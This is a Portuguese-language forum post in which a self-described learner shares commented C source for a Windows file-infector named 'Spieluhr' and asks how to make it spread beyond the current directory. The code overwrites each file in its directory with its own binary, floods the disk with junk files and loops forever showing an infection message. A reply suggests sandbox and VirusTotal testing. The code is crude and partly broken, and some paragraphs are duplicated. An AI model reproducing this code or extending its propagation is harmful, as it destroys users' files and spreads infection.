Spieluhr - esse código pode ser considerado um vírus?
Olá pessoal, então... Estava pensando em estudar desenvolvimentos de malwares(VOLTADO PARA ESTUDOS SÓ), e criei esse código o nomeei de (spieluhr). Porém não sei se ele pode ser considerado um vírus... Se alguém puder tirar minha dúvida agradeço. O código está todo comentado para facilitar a compreensão de vocês, agradeço a atenção.
Por enquanto ele só se replica nos arquivos do diretório atual, se alguém puder passar uma ajuda de como posso fazer para ele se replicar a outros diretórios etc agradeço.
Por enquanto ele só se replica nos arquivos do diretório atual, se alguém puder passar uma ajuda de como posso fazer para ele se replicar a outros diretórios etc agradeço.
Descrição
Olá pessoal, então... Estava pensando em estudar desenvolvimentos de malwares(VOLTADO PARA ESTUDOS SÓ), e criei esse código o nomeei de (spieluhr). Porém não sei se ele pode ser considerado um vírus... Se alguém puder tirar minha dúvida agradeço. O código está todo comentado para facilitar a compreensão de vocês, agradeço a atenção.
Por enquanto ele só se replica nos arquivos do diretório atual, se alguém puder passar uma ajuda de como posso fazer para ele se replicar a outros diretórios etc agradeço.
Por enquanto ele só se replica nos arquivos do diretório atual, se alguém puder passar uma ajuda de como posso fazer para ele se replicar a outros diretórios etc agradeço.
#include <stdio.h> // Importa a biblioteca de entrada e saida
#include <stdlib.h> // Importa a biblioteca do sistema
#include <dirent.h> // Importa a biblioteca de diretórios
#include <windows.h> // Importa a API do windows
int main(void) // Função Main para iniciação do algoritmo
{
DIR *dir; // Ponteiro para o diretório
struct dirent *lsdir; // Estrutura para armazenar os nome dos arquivos
FILE *mal; // Ponteiro para abrir o vírus
FILE *host; // Ponteiro para abrir o arquivo a ser infectado
dir = opendir("."); // Ponteiro que recebe o diretório
while (( lsdir = readdir(dir)) != NULL ) // Estrutura While para ler o que há nos diretórios
{
char Buffer[42269]; // Buffer para armazenar o binário do vírus
mal = fopen("Spieluhr.exe", "rb"); // Abre o vírus em modo leitura de binários
host = fopen(lsdir->d_name, "rb+"); // Abre o arquivo a ser infectado leitura\escrita de binário
fread(Buffer, 42269, 1, mal); // Ler o código binário do vírus
fwrite(Buffer, 42269, 1, host); // Escreve o binário do vírus no hospedeiro
}
int x = 0; // Cria variável do tipo inteiro para o for seguinte
FILE *cf; // Cria um ponteiro para arquivo "CREATE FILE"
char c; // Char para receber inteiros e converter para números
char *ps; // Ponteiro para apontar para C
int l = 65; // Interio para iniciar a contagem
while(x < 3) // Laço WHILE para terminar de executar as ações proprostas
{
for(l; l < 10000; ++l) // For de l(65) até l(1000)
{
c = l; //Char para receber L e converter para char
ps = &c; // Apontador para C
cf = fopen(ps, "w"); //Gerador de arquivo
}
printf("\a"); // Solta o som do windows
Sleep(1000); // Faz a máquina esperar 1 segundos para a próxima Execução
MessageBox(0, "YOU BEEN INFECTED", "Spieluhr", MB_OK); // Windows Box
//O While está sem incremento para manter o laço infinito
}
closedir(dir);
return 0; // Retorna 0 a função main
}
Olá, talvez você possa colocar este cara em uma Sandbox online pra verificar se é detectável e também verificar esta amostra no virustotal. Geralmente para analise de Ransomware Microsoft tem servido bem, mas testa pra Gnu Linux/Unix.
https://www.virustotal.com/gui/home/upload
SANDBOX(Caixa de areia...rs)
https://www.hybrid-analysis.com/
https://app.any.run/